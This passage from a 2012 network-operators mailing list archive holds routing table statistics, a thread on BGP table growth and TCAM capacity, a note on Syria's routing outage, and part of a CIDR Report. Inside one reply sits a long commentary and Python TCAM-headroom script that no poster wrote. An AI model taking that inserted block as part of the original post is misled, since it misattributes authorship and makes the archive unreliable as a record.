Percentage of available ARIN address space announced:              56.7

RIPE Region Analysis Summary
----------------------------

Prefixes being announced by RIPE Region ASes:                    103959
    Total RIPE prefixes after maximum aggregation:                55283
    RIPE Deaggregation factor:                                     1.88
Prefixes being announced from the RIPE address blocks:           106121
    Unique aggregates announced from the RIPE address blocks:     67350
RIPE Region origin ASes present in the Internet Routing Table:    16684
    RIPE Prefixes per ASN:                                         6.36
RIPE Region origin ASes announcing only one prefix:                8081
RIPE Region transit ASes present in the Internet Routing Table:    2715
Average RIPE Region AS path length visible:                         5.0
Max RIPE Region AS path length visible:                              26
Number of RIPE region 32-bit ASNs visible in the Routing Table:    1731
Number of RIPE addresses announced to Internet:               636890756
    Equivalent to 37 /8s, 246 /16s and 46 /24s
Percentage of available RIPE address space announced:              92.6

LACNIC Region Analysis Summary
------------------------------

Prefixes being announced by LACNIC Region ASes:                   42631
    Total LACNIC prefixes after maximum aggregation:               8417
    LACNIC Deaggregation factor:                                   5.06
Prefixes being announced from the LACNIC address blocks:          45328
    Unique aggregates announced from the LACNIC address blocks:   21794
LACNIC Region origin ASes present in the Internet Routing Table:   1612
    LACNIC Prefixes per ASN:                                      28.12
LACNIC Region origin ASes announcing only one prefix:               430
LACNIC Region transit ASes present in the Internet Routing Table:   312
Average LACNIC Region AS path length visible:                       4.7
Max LACNIC Region AS path length visible:                            25
Number of LACNIC region 32-bit ASNs visible in the Routing Table:   626
Number of LACNIC addresses announced to Internet:             112341928
    Equivalent to 6 /8s, 178 /16s and 51 /24s
Percentage of available LACNIC address space announced:            67.0

AfriNIC Region Analysis Summary
-------------------------------

Prefixes being announced by AfriNIC Region ASes:                   9521
    Total AfriNIC prefixes after maximum aggregation:              2161
    AfriNIC Deaggregation factor:                                  4.41
Prefixes being announced from the AfriNIC address blocks:          9962
    Unique aggregates announced from the AfriNIC address blocks:   3408
AfriNIC Region origin ASes present in the Internet Routing Table:   551
    AfriNIC Prefixes per ASN:                                     18.08
AfriNIC Region origin ASes announcing only one prefix:              170
AfriNIC Region transit ASes present in the Internet Routing Table:  123
Average AfriNIC Region AS path length visible:                      4.5
Max AfriNIC Region AS path length visible:                           25
Number of AfriNIC region 32-bit ASNs visible in the Routing Table:    6
Number of AfriNIC addresses announced to Internet:             41297664
    Equivalent to 2 /8s, 118 /16s and 39 /24s
Percentage of available AfriNIC address space announced:           41.0

APNIC Region per AS prefix count summary
----------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
4766         2721      11122    1244  Korea Telecom (KIX)
17974        2240        563      84  PT TELEKOMUNIKASI INDONESIA
7545         1705        301      88  TPG Internet Pty Ltd
4755         1616        388     163  TATA Communications formerly
9829         1305       1085      26  BSNL National Internet Backbo
9583         1162         88     509  Sify Limited
7552         1128       1062      11  Vietel Corporation
4808         1118       2053     318  CNCGROUP IP network: China169
24560        1037        385     165  Bharti Airtel Ltd., Telemedia
9498          989        294      73  BHARTI Airtel Ltd.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC

ARIN Region per AS prefix count summary
---------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
7029         3435        998     172  Windstream Communications Inc
6389         3385       3773     186  bellsouth.net, inc.
18566        2088        382     181  Covad Communications
1785         1937        681     131  PaeTec Communications, Inc.
22773        1680       2911     122  Cox Communications, Inc.
20115        1649       1571     615  Charter Communications
4323         1577       1028     383  Time Warner Telecom
30036        1390        270     779  Mediacom Communications Corp
7018         1247      10039     819  AT&T WorldNet Services
11492        1192        217     350  Cable One

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN

RIPE Region per AS prefix count summary
---------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
8402         1645        544      16  Corbina telecom
2118         1023         97      14  EUnet/RELCOM Autonomous Syste
12479         799        743      92  Uni2 Autonomous System
34984         730        189     174  BILISIM TELEKOM
6830          711       2302     445  UPC Distribution Services
31148         705         37       9  FreeNet ISP
20940         688        223     540  Akamai Technologies European
13188         635        100      10  Educational Network
8551          577        364      61  Bezeq International
3320          499       8443     409  Deutsche Telekom AG

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE

LACNIC Region per AS prefix count summary
-----------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
10620        2010        348     208  TVCABLE BOGOTA
28573        1986       1212      87  NET Servicos de Comunicao S.A
6503         1523        418      66  AVANTEL, S.A.
8151         1463       3044     345  UniNet S.A. de C.V.
7303         1458        934     196  Telecom Argentina Stet-France
6458          856         81      15  GUATEL
27947         717         74      94  Telconet S.A
11172         643         91      74  Servicios Alestra S.A de C.V
3816          596        250      83  Empresa Nacional de Telecomun
22047         583        326      15  VTR PUNTO NET S.A.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC

AfriNIC Region per AS prefix count summary
------------------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
8452          996        958      13  TEDATA
24863         863        274      32  LINKdotNET AS number
6713          509        650      19  Itissalat Al-MAGHRIB
36998         483         48       3  MOBITEL
24835         286         80       8  RAYA Telecom - Egypt
3741          262        905     223  The Internet Solution
12258         197         28      62  Vodacom Internet Company
29975         191        667      21  Vodacom
16637         169        664      86  MTN Network Solutions
29571         160         15      15  Ci Telecom Autonomous system

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC

Global Per AS prefix count summary
----------------------------------

ASN    No of nets  /20 equiv  MaxAgg  Description
7029         3435        998     172  Windstream Communications Inc
6389         3385       3773     186  bellsouth.net, inc.
4766         2721      11122    1244  Korea Telecom (KIX)
17974        2240        563      84  PT TELEKOMUNIKASI INDONESIA
18566        2088        382     181  Covad Communications
10620        2010        348     208  TVCABLE BOGOTA
28573        1986       1212      87  NET Servicos de Comunicao S.A
1785         1937        681     131  PaeTec Communications, Inc.
7545         1705        301      88  TPG Internet Pty Ltd
22773        1680       2911     122  Cox Communications, Inc.

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet

Global Per AS Maximum Aggr summary
----------------------------------

ASN    No of nets  Net Savings  Description
6389         3385         3199  bellsouth.net, inc.
17974        2240         2156  PT TELEKOMUNIKASI INDONESIA
18566        2088         1907  Covad Communications
28573        1986         1899  NET Servicos de Comunicao S.A
1785         1937         1806  PaeTec Communications, Inc.
10620        2010         1802  TVCABLE BOGOTA
8402         1645         1629  Corbina telecom
7545         1705         1617  TPG Internet Pty Ltd
22773        1680         1558  Cox Communications, Inc.
4766         2721         1477  Korea Telecom (KIX)

Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet

List of Unregistered Origin ASNs (Global)
-----------------------------------------

Bad AS  Designation  Network            Transit AS  Description
59407   UNALLOCATED  5.134.16.0/21      51167       Giga-Hosting GmbH
59457   UNALLOCATED  5.149.64.0/19      35567       DASTO semtel d.o.o.
15132   UNALLOCATED  12.9.150.0/24      7018        AT&T WorldNet Servic
25639   UNALLOCATED  12.41.169.0/24     7018        AT&T WorldNet Servic
13317   UNALLOCATED  12.44.10.0/24      7018        AT&T WorldNet Servic
23502   UNALLOCATED  12.44.44.0/24      7018        AT&T WorldNet Servic
17300   UNALLOCATED  12.45.103.0/24     7018        AT&T WorldNet Servic
17300   UNALLOCATED  12.45.110.0/24     701         UUNET Technologies,
16476   UNALLOCATED  12.46.27.0/24      7018        AT&T WorldNet Servic
14764   UNALLOCATED  12.108.237.0/24    7018        AT&T WorldNet Servic

Complete listing at http://thyme.rand.apnic.net/current/data-badAS

Prefixes from private and non-routed address space (Global)
-----------------------------------------------------------

Prefix            Origin AS  Description
198.18.0.0/15     14744      Internap Network Services

Complete listing at http://thyme.rand.apnic.net/current/data-dsua

Advertised Unallocated Addresses
--------------------------------

Network           Origin AS  Description
5.152.176.0/24    25577      C4L main AS
5.153.64.0/19     12703      edNETs Autonomous System
5.154.0.0/23      56465      Sistem Soft Network SRL
14.192.0.0/22     45464      Room 201, TGU Bldg
14.192.4.0/22     45464      Room 201, TGU Bldg
14.192.8.0/22     45464      Room 201, TGU Bldg
14.192.12.0/22    45464      Room 201, TGU Bldg
14.192.16.0/22    45464      Room 201, TGU Bldg
14.192.20.0/22    45464      Room 201, TGU Bldg
14.192.24.0/22    45464      Room 201, TGU Bldg

Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA

Number of prefixes announced per prefix length (Global)
-------------------------------------------------------

 /1:0        /2:0        /3:0        /4:0        /5:0        /6:0
 /7:0        /8:19       /9:12       /10:28      /11:82      /12:236
 /13:473     /14:844     /15:1524    /16:12297   /17:6372    /18:10763
 /19:20919   /20:29792   /21:31641   /22:41286   /23:39374   /24:218584
 /25:1212    /26:1472    /27:854     /28:163     /29:60      /30:18
 /31:0       /32:23

Advertised prefixes smaller than registry allocations
-----------------------------------------------------

ASN    No of nets  Total ann.  Description
7029         2774        3435  Windstream Communications Inc
18566        2038        2088  Covad Communications
6389         1865        3385  bellsouth.net, inc.
8402         1343        1645  Corbina telecom
30036        1325        1390  Mediacom Communications Corp
11492        1155        1192  Cable One
22773        1107        1680  Cox Communications, Inc.
6503         1051        1523  AVANTEL, S.A.
1785         1044        1937  PaeTec Communications, Inc.
7011          930        1191  Citizens Utilities

Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos

Number of /24s announced per /8 block (Global)
----------------------------------------------
195:3210 196:1210 197:177 198:3681 199:4936 200:5991 201:1966 202:8695 203:8668 204:4392
205:2545 206:2791 207:2827 208:4046 209:3628 210:2783 211:1564 212:1973 213:1791 214:875
215:85 216:5085 217:1568 218:545 219:337 220:1222 221:572 222:336 223:347

End of report

From valdis.kletnieks at vt.edu Fri Jul 20 15:04:36 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Fri, 20 Jul 2012 16:04:36 -0400
Subject: Weekly Routing Table Report
In-Reply-To: Your message of "Sat, 21 Jul 2012 05:10:41 +1000." <201207201910.q6KJAkHr026414@thyme.rand.apnic.net>
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net>
Message-ID: <36781.1342814676@turing-police.cc.vt.edu>

On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said:
> This is an automated weekly mailing describing the state of the Internet
> Routing Table as seen from APNIC's router in Japan.

> BGP routing table entries examined: 418048

So, whatever happened to that whole "the internet will catch fire when
we get to 280K routing table entries" or whatever it was? :)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 865 bytes
Desc: not available
URL:

From djahandarie at gmail.com Fri Jul 20 15:10:40 2012
From: djahandarie at gmail.com (Darius Jahandarie)
Date: Fri, 20 Jul 2012 16:10:40 -0400
Subject: Weekly Routing Table Report
In-Reply-To: <36781.1342814676@turing-police.cc.vt.edu>
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu>
Message-ID:

On Fri, Jul 20, 2012 at 4:04 PM, wrote:
> So, whatever happened to that whole "the internet will catch fire when
> we get to 280K routing table entries" or whatever it was? :)

But what will happen when we have 4294967295 entries?

-- 
Darius Jahandarie

From patrick at ianai.net Fri Jul 20 15:16:59 2012
From: patrick at ianai.net (Patrick W.
Gilmore)
Date: Fri, 20 Jul 2012 16:16:59 -0400
Subject: Weekly Routing Table Report
In-Reply-To:
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu>
Message-ID:

On Jul 20, 2012, at 16:10 , Darius Jahandarie wrote:
> On Fri, Jul 20, 2012 at 4:04 PM, wrote:
>> So, whatever happened to that whole "the internet will catch fire when
>> we get to 280K routing table entries" or whatever it was? :)
>
> But what will happen when we have 4294967295 entries?

Nothing. But when we hit 4294967296.... =)

-- 
TTFN,
patrick

From ron at spawar.navy.mil Fri Jul 20 15:30:06 2012
From: ron at spawar.navy.mil (Ron Broersma)
Date: Fri, 20 Jul 2012 13:30:06 -0700
Subject: Weekly Routing Table Report
In-Reply-To: <36781.1342814676@turing-police.cc.vt.edu>
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu>
Message-ID: <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil>

On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote:
> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said:
>> BGP routing table entries examined: 418048
> So, whatever happened to that whole "the internet will catch fire when
> we get to 280K routing table entries" or whatever it was? :)

We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes.
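The practical point of this thread is that the ceiling is whatever FIB partition a linecard's TCAM profile gives you (the 512K IPv4 / 256K IPv6 figures and the CAM profile dump that follow further down), not a round number like 1M, and that an IPv6 route can take two slots. The following is an added example, not code from anyone posting here: it parses a 'show cam-profile'-style dump (the sample is constructed, modelled on the Force10 output quoted later in the thread), compares the IPv4FIB and IPv6FIB partitions with the routes they must hold, and projects how many weeks of headroom remain. Assumptions: 'K' in these dumps means 1024 entries; 418048 is the table size from the weekly report above, while the IPv6 route count (9500) and the weekly growth rates are constructed.

```python
"""Headroom check for the FIB partitions of a linecard CAM/TCAM profile.

Added example for this thread (not code from anyone posting in it): parse a
'show cam-profile'-style dump, compare each FIB partition with the number
of routes it must hold, and project when it fills.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input, modelled on the Force10 CAM profile quoted in
# this thread (only the regions needed here are reproduced).
SAMPLE_CAM_PROFILE = """\
CamSize : 40-Meg : Current Settings
Profile Name : default
Microcode Name : Default
L2FIB : 15K entries
System Flow : 102 entries
IPv4FIB : 512K entries
IPv4ACL : 16K entries
IPv6FIB : 12K entries
IPv6ACL : 6K entries
GenEgACL : 0.5K entries
"""

# Matches lines such as "IPv4FIB : 512K entries", "System Flow : 102 entries"
# or "GenEgACL : 0.5K entries"; region names may contain spaces and slashes.
_ENTRY_RE = re.compile(
    r"^\s*(?P<name>[A-Za-z0-9/]+(?: [A-Za-z0-9/]+)*)\s*:\s*"
    r"(?P<size>\d+(?:\.\d+)?)(?P<unit>K?) entries",
    re.MULTILINE,
)


def parse_cam_profile(text: str) -> Dict[str, int]:
    """Return {region: entries} for every '... entries' line in the dump.

    Assumption: 'K' in these dumps means 1024, so 512K is 524288 entries.
    Where a region name repeats across sections (the quoted dump lists
    'Qos' several times) the first occurrence wins; the FIB regions are unique.
    """
    regions: Dict[str, int] = {}
    for m in _ENTRY_RE.finditer(text):
        size = float(m.group("size"))
        entries = int(size * 1024) if m.group("unit") == "K" else int(size)
        regions.setdefault(m.group("name"), entries)
    return regions


@dataclass(frozen=True)
class Headroom:
    region: str
    capacity: int    # entries available in this partition
    used: int        # entries the current table needs
    warn_at: float   # utilisation ratio that triggers a warning

    @property
    def utilisation(self) -> float:
        return self.used / self.capacity

    @property
    def free(self) -> int:
        return max(self.capacity - self.used, 0)

    @property
    def status(self) -> str:
        if self.used >= self.capacity:
            return "FULL"
        return "WARN" if self.utilisation >= self.warn_at else "OK"


def check_headroom(profile: Dict[str, int], ipv4_routes: int, ipv6_routes: int,
                   ipv6_slots_per_route: int = 1, warn_at: float = 0.8) -> List[Headroom]:
    """Compare the IPv4FIB and IPv6FIB partitions with the routes they must carry.

    ipv6_slots_per_route=2 models the 'IPv6 takes double space' case raised
    in this thread, where one IPv6 route consumes two TCAM slots.
    """
    return [
        Headroom("IPv4FIB", profile["IPv4FIB"], ipv4_routes, warn_at),
        Headroom("IPv6FIB", profile["IPv6FIB"], ipv6_routes * ipv6_slots_per_route, warn_at),
    ]


def weeks_until_full(h: Headroom, growth_per_week: int) -> Optional[float]:
    """Linear projection of how many weeks of growth the free entries absorb;
    None when the table is not growing."""
    if growth_per_week <= 0:
        return None
    return h.free / growth_per_week


if __name__ == "__main__":
    profile = parse_cam_profile(SAMPLE_CAM_PROFILE)
    # 418048 is the IPv4 table size from the weekly report above; the IPv6
    # route count and the weekly growth figures are constructed for the example.
    growth = {"IPv4FIB": 1000, "IPv6FIB": 150}
    for h in check_headroom(profile, ipv4_routes=418048, ipv6_routes=9500):
        eta = weeks_until_full(h, growth[h.region])
        line = f"{h.region}: {h.used}/{h.capacity} ({h.utilisation:.1%}) {h.status}"
        if eta is not None:
            line += f", ~{eta:.0f} weeks of headroom at +{growth[h.region]}/week"
        print(line)
```

Run as a script it prints one status line per partition. With the sample profile the IPv4FIB sits just under 80% with 418048 routes; passing `ipv6_slots_per_route=2` flips the sample's IPv6FIB to FULL, which is the kind of surprise the "check your tcam profiles" advice in this thread is about.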
From jared at puck.nether.net Fri Jul 20 15:40:54 2012
From: jared at puck.nether.net (Jared Mauch)
Date: Fri, 20 Jul 2012 16:40:54 -0400
Subject: Weekly Routing Table Report
In-Reply-To: <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil>
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil>
Message-ID: <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net>

On Jul 20, 2012, at 4:30 PM, Ron Broersma wrote:
>
> On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote:
>> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said:
>>> BGP routing table entries examined: 418048
>> So, whatever happened to that whole "the internet will catch fire when
>> we get to 280K routing table entries" or whatever it was? :)
>
> We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes.

I think you mean 512k IPv4 with 256k of IPv6 (taking double space).

Make sure you check your tcam profiles :)

- Jared

From valdis.kletnieks at vt.edu Fri Jul 20 15:55:12 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Fri, 20 Jul 2012 16:55:12 -0400
Subject: Weekly Routing Table Report
In-Reply-To: Your message of "Fri, 20 Jul 2012 16:16:59 -0400."
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu>
Message-ID: <40383.1342817712@turing-police.cc.vt.edu>

On Fri, 20 Jul 2012 16:16:59 -0400, "Patrick W. Gilmore" said:
> On Jul 20, 2012, at 16:10 , Darius Jahandarie wrote:
> > On Fri, Jul 20, 2012 at 4:04 PM, wrote:
> >> So, whatever happened to that whole "the internet will catch fire when
> >> we get to 280K routing table entries" or whatever it was? :)
> >
> > But what will happen when we have 4294967295 entries?
>
> Nothing. But when we hit 4294967296....
By that point router vendors will hopefully have moved to 64-bit CPUs.
18446744073709551616 routes will hopefully not happen until after I retire,
so you young whippersnappers will be on your own on that one. ;)

From joelja at bogus.com Fri Jul 20 16:05:43 2012
From: joelja at bogus.com (Joel jaeggli)
Date: Fri, 20 Jul 2012 14:05:43 -0700
Subject: Weekly Routing Table Report
In-Reply-To: <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net>
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil> <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net>
Message-ID: <5009C827.4090600@bogus.com>

On 7/20/12 13:40 , Jared Mauch wrote:
>
> On Jul 20, 2012, at 4:30 PM, Ron Broersma wrote:
>
>>
>> On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote:
>>> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said:
>>>> BGP routing table entries examined: 418048
>>> So, whatever happened to that whole "the internet will catch fire when
>>> we get to 280K routing table entries" or whatever it was? :)
>>
>> We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes.
>
> I think you mean 512k IPv4 with 256k of IPv6 (taking double space).

if you're still on a platform with 40Mbit cams it's beginning to look kinda tight as an internet router. you've probably got less than a year to figure out what to do about this.

an f10 ej linecard cam partitioning scheme for example looks something like:
CamSize : 40-Meg : Current Settings
Profile Name : default
Microcode Name : Default
L2FIB : 15K entries
Learn : 1K entries
L2ACL : 5K entries
System Flow : 102 entries
Qos : 500 entries
Frrp : 102 entries
L2pt : 266 entries
PPVlan : 100 entries
IPv4FIB : 512K entries
IPv4ACL : 16K entries
IPv4Flow : 24K entries
Mcast Fib/Acl : 9K entries
Pbr : 1K entries
Qos : 10K entries
System Flow : 4K entries
EgL2ACL : 2K entries
EgIpv4ACL : 4K entries
Mpls : 60K entries
IPv6FIB : 12K entries
IPv6ACL : 6K entries
IPv6Flow : 6K entries
Mcast Fib/Acl : 3K entries
Pbr : 0K entries
Qos : 1K entries
System Flow : 2K entries
EgIpv6ACL : 1K entries
GenEgACL : 0.5K entries
IPv4FHOP : 4K entries
IPv6FHOP : 4K entries
IPv4/IPv6NHOP : 12K entries

> Make sure you check your tcam profiles :)
>
> - Jared
>
>
>

From thepacketmaster at hotmail.com Fri Jul 20 17:08:25 2012
From: thepacketmaster at hotmail.com (James Smith )
Date: Fri, 20 Jul 2012 22:08:25 +0000
Subject: Hearing Syria internet cut
Message-ID:

I'm curious to know what method people use to monitor the changes in the BGP system? Any recommendations?

-----Original Message-----
From: Andree Toonk
Date: Fri, 20 Jul 2012 06:21:21
To:
Cc:
Subject: Re: Hearing Syria internet cut

.-- My secret spy satellite informs me that at 12-07-19 10:00 PM George Bonser wrote:
> Can anyone confirm?

Yes confirmed, about 90% of the Syrian prefixes disappeared from the BGP tables between 13:32 and 14:13 (UTC) earlier today (2012-07-19).

Cheers,
Andree

From surfer at mauigateway.com Fri Jul 20 18:30:58 2012
From: surfer at mauigateway.com (Scott Weeks)
Date: Fri, 20 Jul 2012 16:30:58 -0700
Subject: Hearing Syria internet cut
Message-ID: <20120720163058.A24C068A@m0005296.ppops.net>

--- thepacketmaster at hotmail.com wrote:
From: "James Smith "
I'm curious to know what method people use to monitor the changes in the BGP system? Any recommendations?
------------------------------------------

There're many. Look in the archives.
For this one, though:
http://www.renesys.com/blog/2012/07/syria-leaves-the-internet.shtml

scott

From marka at isc.org Fri Jul 20 20:41:12 2012
From: marka at isc.org (Mark Andrews)
Date: Sat, 21 Jul 2012 11:41:12 +1000
Subject: Weekly Routing Table Report
In-Reply-To: Your message of "Fri, 20 Jul 2012 16:10:40 -0400."
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu>
Message-ID: <20120721014112.E864222D1E83@drugs.dv.isc.org>

In message , Darius Jahandarie writes:
> On Fri, Jul 20, 2012 at 4:04 PM, wrote:
> > So, whatever happened to that whole "the internet will catch fire when
> > we get to 280K routing table entries" or whatever it was? :)
>
> But what will happen when we have 4294967295 entries?

We will long ago have switched to routers that are capable of handling more, or we will succeed in making multi-homing work well enough with PA addresses that we don't get there.

Mark
-- 
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: marka at isc.org

From cidr-report at potaroo.net Fri Jul 20 17:00:00 2012
From: cidr-report at potaroo.net (cidr-report at potaroo.net)
Date: Fri, 20 Jul 2012 22:00:00 GMT
Subject: The Cidr Report
Message-ID: <201207202200.q6KM002w040846@wattle.apnic.net>

This report has been generated at Fri Jul 20 21:10:01 2012 AEST.
The report analyses the BGP Routing Table of AS2.0 router
and generates a report on aggregation potential within the table.

Check http://www.cidr-report.org for a current version of this report.

Recent Table History
Date Prefixes CIDR Agg
13-07-12 418251 242235
14-07-12 419241 242041
15-07-12 419351 241919
16-07-12 419198 241935
17-07-12 419152 241935
18-07-12 0 241935
19-07-12 0 241935
20-07-12 0 241935

AS Summary
0 Number of ASes in routing system
0 Number of ASes announcing only one prefix
3388 Largest number of prefixes announced by an AS
AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc.
0 Largest address span announced by an AS (/32s) ????? : BELLSOUTH-NET-BLK - BellSouth.net Inc. Aggregation Summary The algorithm used in this report proposes aggregation only when there is a precise match using the AS path, so as to preserve traffic transit policies. Aggregation is also proposed across non-advertised address space ('holes'). --- 20Jul12 --- ASnum NetsNow NetsAggr NetGain % Gain Description Table 419152 241935 177217 42.3% All ASes AS6389 3388 189 3199 94.4% BELLSOUTH-NET-BLK - BellSouth.net Inc. AS28573 2007 279 1728 86.1% NET Servicos de Comunicao S.A. AS17974 2217 529 1688 76.1% TELKOMNET-AS2-AP PT Telekomunikasi Indonesia AS7029 3340 1669 1671 50.0% WINDSTREAM - Windstream Communications Inc AS18566 2088 417 1671 80.0% COVAD - Covad Communications Co. AS22773 1664 132 1532 92.1% ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc. AS4766 2741 1282 1459 53.2% KIXS-AS-KR Korea Telecom AS10620 1990 598 1392 69.9% Telmex Colombia S.A. AS4323 1576 387 1189 75.4% TWTC - tw telecom holdings, inc. AS1785 1936 814 1122 58.0% AS-PAETEC-NET - PaeTec Communications, Inc. AS4755 1614 575 1039 64.4% TATACOMM-AS TATA Communications formerly VSNL is Leading ISP AS2118 1023 15 1008 98.5% RELCOM-AS OOO "NPO Relcom" AS7303 1454 452 1002 68.9% Telecom Argentina S.A. AS7552 1128 238 890 78.9% VIETEL-AS-AP Vietel Corporation AS8151 1468 669 799 54.4% Uninet S.A. de C.V. AS6458 853 56 797 93.4% Telgua AS18101 944 159 785 83.2% RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI AS17908 828 60 768 92.8% TCISL Tata Communications AS4808 1117 352 765 68.5% CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network AS9394 889 161 728 81.9% CRNET CHINA RAILWAY Internet(CRNET) AS13977 839 123 716 85.3% CTELCO - FAIRPOINT COMMUNICATIONS, INC. AS855 695 53 642 92.4% CANET-ASN-4 - Bell Aliant Regional Communications, Inc. 
AS8452 1106 466 640 57.9% TE-AS TE-AS AS3356 1105 470 635 57.5% LEVEL3 Level 3 Communications AS17676 693 76 617 89.0% GIGAINFRA Softbank BB Corp. AS4780 842 242 600 71.3% SEEDNET Digital United Inc. AS19262 998 405 593 59.4% VZGNI-TRANSIT - Verizon Online LLC AS22561 1008 415 593 58.8% DIGITAL-TELEPORT - Digital Teleport Inc. AS24560 1037 450 587 56.6% AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services AS3549 988 433 555 56.2% GBLX Global Crossing Ltd. Total 43576 12166 31410 72.1% Top 30 total Possible Bogus Routes 10.86.64.32/30 AS65530 -Private Use AS- 10.86.64.36/30 AS65530 -Private Use AS- 10.86.65.32/30 AS65530 -Private Use AS- 10.86.65.36/30 AS65530 -Private Use AS- 10.255.255.0/30 AS65530 -Private Use AS- 10.255.255.4/30 AS65530 -Private Use AS- 10.255.255.8/30 AS65530 -Private Use AS- 14.192.0.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.4.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.8.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.12.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.16.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.20.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.24.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.28.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 27.112.114.0/24 AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd. 41.222.80.0/21 AS37110 moztel-as 41.222.82.0/24 AS37110 moztel-as 41.222.83.0/24 AS37110 moztel-as 41.222.85.0/24 AS37110 moztel-as 41.222.86.0/24 AS37110 moztel-as 41.222.87.0/24 AS37110 moztel-as 41.223.108.0/22 AS36966 EDL_AS Edgenet AS 62.61.220.0/24 AS24974 TACHYON-EU Tachyon Europe BV 62.61.221.0/24 AS24974 TACHYON-EU Tachyon Europe BV 64.66.32.0/20 AS18864 66.171.32.0/20 AS705 UUNET - MCI Communications Services, Inc. 
d/b/a Verizon Business 66.180.239.0/24 AS35888 VIGNETTE - VIGNETTE CORPORATION 66.207.32.0/20 AS23011 66.245.176.0/20 AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC 66.251.128.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.133.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.134.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.136.0/21 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.140.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.141.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.142.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.143.0/24 AS3356 LEVEL3 Level 3 Communications 69.46.224.0/20 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.233.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.236.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 70.34.112.0/20 AS27589 MOJOHOST - MOJOHOST 71.19.134.0/23 AS3313 INET-AS BT Italia S.p.A. 72.35.224.0/22 AS30097 NUWAVE - NuWave 72.35.229.0/24 AS30188 TELEVERGENCE - Televergence Solutions Inc. 
